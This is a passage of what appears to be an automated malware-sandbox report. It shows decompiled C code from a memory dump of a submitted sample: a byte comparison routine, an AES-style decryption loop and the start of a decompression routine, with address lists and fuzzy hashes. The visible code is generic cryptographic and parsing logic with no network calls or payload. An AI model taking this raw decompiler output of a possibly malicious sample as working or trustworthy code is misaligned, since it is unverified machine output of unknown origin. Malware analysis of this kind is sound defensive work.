					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x00bc0146
0x00bc0146
0x00bc0146
0x00bc014c
0x00bc01d3
0x00bc01d5
0x00bc01d7
0x00bc0556
0x00bc0556
0x00bc1347
0x00bc1347
0x00bc01dd
0x00bc01e3
0x00bc026a
0x00bc026c
0x00bc026e
0x00000000
0x00000000
0x00bc0274
0x00bc027a
0x00bc0301
0x00bc0303
0x00bc0305
0x00000000
0x00000000
0x00bc030b
0x00bc0311
0x00bc0398
0x00bc039a
0x00bc039c
0x00000000
0x00000000
0x00bc03a8
0x00bc0430
0x00bc0432
0x00bc0434
0x00000000
0x00000000
0x00bc043a
0x00bc0440
0x00bc04c7
0x00bc04c9
0x00bc04cb
0x00000000
0x00000000
0x00bc04d1
0x00bc04d7
0x00bc054e
0x00bc0550
0x00bc0552
0x00bc0554
0x00bc0554
0x00000000
0x00bc0552
0x00bc04e0
0x00bc04e2
0x00bc04f6
0x00bc04fe
0x00bc0500
0x00bc0514
0x00bc051c
0x00bc051e
0x00bc0532
0x00bc053a
0x00bc053c
0x00bc0545
0x00bc0545
0x00000000
0x00bc053c
0x00bc0527
0x00bc0530
0x00000000
0x00000000
0x00000000
0x00bc0530
0x00bc0509
0x00bc0512
0x00000000
0x00000000
0x00000000
0x00bc0512
0x00bc04eb
0x00bc04f4
0x00000000
0x00000000
0x00000000
0x00bc04f4
0x00bc044d
0x00bc044f
0x00bc0467
0x00bc046f
0x00bc0471
0x00bc0489
0x00bc0491
0x00bc0493
0x00bc04ab
0x00bc04b3
0x00bc04b5
0x00bc04be
0x00bc04be
0x00000000
0x00bc04b5
0x00bc049c
0x00bc04a5
0x00000000
0x00000000
0x00000000
0x00bc04a5
0x00bc047a
0x00bc0483
0x00000000
0x00000000
0x00000000
0x00bc0483
0x00bc0458
0x00bc0461
0x00000000
0x00000000
0x00000000
0x00bc0461
0x00bc03b6
0x00bc03b8
0x00bc03d0
0x00bc03d8
0x00bc03da
0x00bc03f2
0x00bc03fa
0x00bc03fc
0x00bc0414
0x00bc041c
0x00bc041e
0x00bc0427
0x00bc0427
0x00000000
0x00bc041e
0x00bc0405
0x00bc040e
0x00000000
0x00000000
0x00000000
0x00bc040e
0x00bc03e3
0x00bc03ec
0x00000000
0x00000000
0x00000000
0x00bc03ec
0x00bc03c1
0x00bc03ca
0x00000000
0x00000000
0x00000000
0x00bc03ca
0x00bc031e
0x00bc0320
0x00bc0338
0x00bc0340
0x00bc0342
0x00bc035a
0x00bc0362
0x00bc0364
0x00bc037c
0x00bc0384
0x00bc0386
0x00bc038f
0x00bc038f
0x00000000
0x00bc0386
0x00bc036d
0x00bc0376
0x00000000
0x00000000
0x00000000
0x00bc0376
0x00bc034b
0x00bc0354
0x00000000
0x00000000
0x00000000
0x00bc0354
0x00bc0329
0x00bc0332
0x00000000
0x00000000
0x00000000
0x00bc0332
0x00bc0287
0x00bc0289
0x00bc02a1
0x00bc02a9
0x00bc02ab
0x00bc02c3
0x00bc02cb
0x00bc02cd
0x00bc02e5
0x00bc02ed
0x00bc02ef
0x00bc02f8
0x00bc02f8
0x00000000
0x00bc02ef
0x00bc02d6
0x00bc02df
0x00000000
0x00000000
0x00000000
0x00bc02df
0x00bc02b4
0x00bc02bd
0x00000000
0x00000000
0x00000000
0x00bc02bd
0x00bc0292
0x00bc029b
0x00000000
0x00000000
0x00000000
0x00bc029b
0x00bc01f0
0x00bc01f2
0x00bc020a
0x00bc0212
0x00bc0214
0x00bc022c
0x00bc0234
0x00bc0236
0x00bc024e
0x00bc0256
0x00bc0258
0x00bc0261
0x00bc0261
0x00000000
0x00bc0258
0x00bc023f
0x00bc0248
0x00000000
0x00000000
0x00000000
0x00bc0248
0x00bc021d
0x00bc0226
0x00000000
0x00000000
0x00000000
0x00bc0226
0x00bc01fb
0x00bc0204
0x00000000
0x00000000
0x00000000
0x00bc0204
0x00bc0159
0x00bc015b
0x00bc0173
0x00bc017b
0x00bc017d
0x00bc0195
0x00bc019d
0x00bc019f
0x00bc01b7
0x00bc01bf
0x00bc01c1
0x00bc01ca
0x00bc01ca
0x00000000
0x00bc01c1
0x00bc01a8
0x00bc01b1
0x00000000
0x00000000
0x00000000
0x00bc01b1
0x00bc0186
0x00bc018f
0x00000000
0x00000000
0x00000000
0x00bc018f
0x00bc0164
0x00bc016d
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: c02d937bf838669d2e488760334ebd302d8902012fa313b299054ddeeb5f4725
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: D6C181322191938BDB2D563D8574A3FBBE59AA17B131A07EDD4B7CB1C4FE20C5249A20

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE1E0 Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BAE1E0(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				intOrPtr _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				unsigned int _t424;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x6c);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x24)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x6c) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x38)) = __ecx + 8;
						E00BBF300(_t431 + 0x5c, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E00BBF300( *((intOrPtr*)(_t432 + 0x38)), _t432 + 0x58, 0x10);
						}
						_t399 =  *(_t432 + 0x68);
						 *(_t432 + 0x24) = _t399 + 8;
						_t229 =  *((intOrPtr*)(_t432 + 0x78));
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x34)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x28) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x30) = _t359 + _t400 + 0xfffffff8;
							E00BAE1AE(_t432 + 0x54, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0xbe51c0 + (_t402 & 0x000000ff) * 4) ^  *(0xbe5dc0 + ( *(_t432 + 0x53) & 0x000000ff) * 4) ^  *(0xbe59c0 + ( *(_t432 + 0x56) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x58);
							_t363 =  *(_t432 + 0x10) ^  *(0xbe55c0 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t363;
							 *(_t432 + 0x3c) = _t363;
							_t403 =  *(_t432 + 0x50);
							_t368 =  *(0xbe55c0 + (_t402 & 0x000000ff) * 4) ^  *(0xbe51c0 + (_t403 & 0x000000ff) * 4) ^  *(0xbe5dc0 + ( *(_t432 + 0x57) & 0x000000ff) * 4) ^  *(0xbe59c0 + ( *(_t432 + 0x5a) & 0x000000ff) * 4);
							 *(_t432 + 0x14) = _t368;
							 *(_t432 + 0x40) = _t368;
							_t404 =  *(_t432 + 0x54);
							 *(_t432 + 0x18) =  *(0xbe59c0 + ( *(_t432 + 0x4e) & 0x000000ff) * 4) ^  *(0xbe55c0 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x18) ^  *(0xbe51c0 + (_t404 & 0x000000ff) * 4) ^  *(0xbe5dc0 + ( *(_t432 + 0x5b) & 0x000000ff) * 4);
							 *(_t432 + 0x18) = _t372;
							 *(_t432 + 0x44) = _t372;
							 *(_t432 + 0x1c) =  *(0xbe5dc0 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0xbe59c0 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x1c) ^  *(0xbe55c0 + (_t404 & 0x000000ff) * 4) ^  *(0xbe51c0 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x1c) = _t376;
							 *(_t432 + 0x48) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x10);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x1c) = _t309;
							_t430 = _t309;
							 *(_t432 + 0x20) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x10) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x18);
								 *(_t432 + 0x1c) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x14);
								_t416 =  *(0xbe55c0 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbe59c0 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbe5dc0 + (_t356 >> 0x18) * 4) ^  *(0xbe51c0 + ( *(_t432 + 0x10) & 0x000000ff) * 4);
								 *(_t432 + 0x3c) = _t416;
								 *(_t432 + 0x14) =  *(0xbe59c0 + ( *(_t432 + 0x1c) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbe5dc0 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x14) ^  *(0xbe55c0 + ( *(_t432 + 0x10) >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbe51c0 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x14) = _t388;
								 *(_t432 + 0x40) = _t388;
								_t394 =  *(0xbe5dc0 + ( *(_t432 + 0x1c) >> 0x18) * 4) ^  *(0xbe55c0 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbe59c0 + ( *(_t432 + 0x10) >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbe51c0 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x18) = _t394;
								 *(_t432 + 0x44) = _t394;
								_t376 =  *(0xbe55c0 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xbe59c0 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xbe5dc0 + ( *(_t432 + 0x10) >> 0x18) * 4) ^  *(0xbe51c0 + ( *(_t432 + 0x1c) & 0x000000ff) * 4);
								_t135 = _t432 + 0x20;
								 *_t135 =  *(_t432 + 0x20) - 1;
								 *(_t432 + 0x48) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t432 + 0x10) = _t416;
							_t415 =  *(_t432 + 0x74);
							 *(_t432 + 0x1c) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x10);
							 *(_t432 + 0x20) = _t253;
							 *(_t432 + 0x4c) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x1c);
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0xbe40a0));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x18);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x14);
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0xbe40a0));
							_t423 =  *(_t432 + 0x20);
							 *(_t432 + 0x54) = _t406;
							 *(_t432 + 0x50) = _t350;
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0xbe40a0));
							 *(_t432 + 0x58) = _t378;
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t350 >> 0x18) + 0xbe40a0));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t406 >> 0x18) + 0xbe40a0));
							 *(_t432 + 0x44) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x45)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0xbe40a0));
							_t424 = _t423 >> 0x18;
							 *((char*)(_t432 + 0x46)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x47)) =  *((intOrPtr*)((_t378 >> 0x18) + 0xbe40a0));
							 *(_t432 + 0x48) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0xbe40a0));
							_t409 =  *(_t432 + 0x3c) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x49)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0xbe40a0));
							 *((char*)(_t432 + 0x4a)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0xbe40a0));
							_t188 = _t424 + 0xbe40a0; // 0x30d56a09
							 *((char*)(_t432 + 0x4b)) =  *_t188;
							_t301 =  *(_t432 + 0x48) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x40) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x44) ^  *(_t429 + 0x20);
							 *(_t432 + 0x20) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x5c);
								_t426 = _t426 ^  *(_t432 + 0x60);
								_t353 = _t353 ^  *(_t432 + 0x64);
								 *(_t432 + 0x20) = _t301 ^  *(_t432 + 0x68);
							}
							 *(_t432 + 0x5c) =  *( *(_t432 + 0x30));
							_t304 =  *(_t432 + 0x24);
							 *(_t432 + 0x60) =  *(_t304 - 4);
							 *(_t432 + 0x64) =  *_t304;
							 *(_t432 + 0x68) = _t304[1];
							_t382 =  *(_t432 + 0x28);
							 *(_t432 + 0x24) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x20);
							_t400 =  *((intOrPtr*)(_t432 + 0x34));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x28) = _t359;
							 *(_t432 + 0x74) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E00BAE6A2( *((intOrPtr*)(_t431 + 0x70)), _t415,  *((intOrPtr*)(_t431 + 0x70)));
				}
				return _t222;
			}

0x00bae1e5
0x00bae1e9
0x00bae1eb
0x00bae1f1
0x00bae1f7
0x00bae1fe
0x00bae202
0x00bae21d
0x00bae226
0x00bae22b
0x00bae230
0x00bae687
0x00000000
0x00bae697
0x00bae236
0x00bae23f
0x00bae243
0x00bae247
0x00bae249
0x00bae24d
0x00bae250
0x00bae254
0x00bae254
0x00bae264
0x00bae271
0x00bae276
0x00bae29c
0x00bae2a0
0x00bae2ab
0x00bae2b2
0x00bae2b6
0x00bae2bd
0x00bae2e3
0x00bae2ef
0x00bae2f3
0x00bae301
0x00bae30c
0x00bae323
0x00bae32f
0x00bae333
0x00bae34a
0x00bae35f
0x00bae366
0x00bae367
0x00bae36b
0x00bae372
0x00000000
0x00000000
0x00bae378
0x00bae382
0x00bae385
0x00bae389
0x00bae38b
0x00bae38f
0x00bae394
0x00bae397
0x00bae39b
0x00bae3a1
0x00bae3a3
0x00bae3a7
0x00bae3b6
0x00bae3e6
0x00bae3f7
0x00bae409
0x00bae425
0x00bae42e
0x00bae432
0x00bae46b
0x00bae472
0x00bae476
0x00bae4a3
0x00bae4aa
0x00bae4aa
0x00bae4af
0x00bae4af
0x00bae4b9
0x00bae4bd
0x00bae4c1
0x00bae4c5
0x00bae4c9
0x00bae4cc
0x00bae4d0
0x00bae4d4
0x00bae4de
0x00bae4eb
0x00bae4f7
0x00bae4fe
0x00bae508
0x00bae514
0x00bae518
0x00bae51c
0x00bae526
0x00bae52f
0x00bae539
0x00bae546
0x00bae558
0x00bae56a
0x00bae579
0x00bae589
0x00bae59e
0x00bae5aa
0x00bae5b3
0x00bae5c2
0x00bae5cf
0x00bae5da
0x00bae5e3
0x00bae5f0
0x00bae5f4
0x00bae5fa
0x00bae60a
0x00bae60d
0x00bae610
0x00bae617
0x00bae61b
0x00bae61d
0x00bae621
0x00bae625
0x00bae62d
0x00bae62d
0x00bae637
0x00bae63b
0x00bae642
0x00bae648
0x00bae652
0x00bae656
0x00bae65a
0x00bae65e
0x00bae665
0x00bae668
0x00bae66c
0x00bae66f
0x00bae671
0x00bae674
0x00bae677
0x00bae67b
0x00bae67b
0x00000000
0x00bae686
0x00000000
0x00bae20d
0x00bae69f

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2270f1713f1cd42a094addceb17f717d2beb11f18108b7b13a0903251bf4a59
Instruction ID: 453b01e540cbbecbaa61ad84c2ebf09f394bb4862d667b06acfa945f117da7ad
Opcode Fuzzy Hash: d2270f1713f1cd42a094addceb17f717d2beb11f18108b7b13a0903251bf4a59
Instruction Fuzzy Hash: 8CE136745083848FC314CF29D89096ABBF0BF9A304F8549AEF5D59B352C735EA09DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BB39AC Relevance: .3, Instructions: 263
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E00BB39AC(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t82;
				signed int _t88;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t116;
				signed int _t127;
				void* _t135;
				signed int _t137;
				signed int _t138;
				signed int _t148;
				signed int _t150;
				void* _t152;
				signed int _t155;
				signed int _t156;
				intOrPtr* _t157;
				intOrPtr* _t166;
				signed int _t169;
				void* _t170;
				signed int _t173;
				void* _t178;
				unsigned int _t180;
				signed int _t183;
				intOrPtr* _t184;
				void* _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t192;
				signed int _t198;
				void* _t201;

				_t178 = __edx;
				_t185 = __ecx;
				_t184 = __ecx + 4;
				if( *_t184 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
					L2:
					E00BAA724(_t184,  ~( *(_t185 + 8)) & 0x00000007);
					_t82 = E00BAA73B(_t184);
					_t205 = _t82 & 0x00008000;
					if((_t82 & 0x00008000) == 0) {
						_t137 = 0;
						 *((intOrPtr*)(_t185 + 0xe65c)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d0)) = 0;
						 *((intOrPtr*)(_t185 + 0x98d4)) = 0;
						__eflags = _t82 & 0x00004000;
						if((_t82 & 0x00004000) == 0) {
							E00BBF1A0(_t184, _t185 + 0xe4c8, 0, 0x194);
							_t201 = _t201 + 0xc;
						}
						E00BAA724(_t184, 2);
						do {
